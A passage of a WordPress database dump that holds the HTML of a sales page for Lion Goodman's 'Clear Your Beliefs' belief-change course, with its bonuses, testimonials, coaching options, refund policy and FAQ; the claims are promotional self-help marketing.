Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-20 19:14:33', '2014-06-21 00:14:33', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1055, 2, '2014-06-20 19:28:17', '2014-06-21 00:28:17', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your 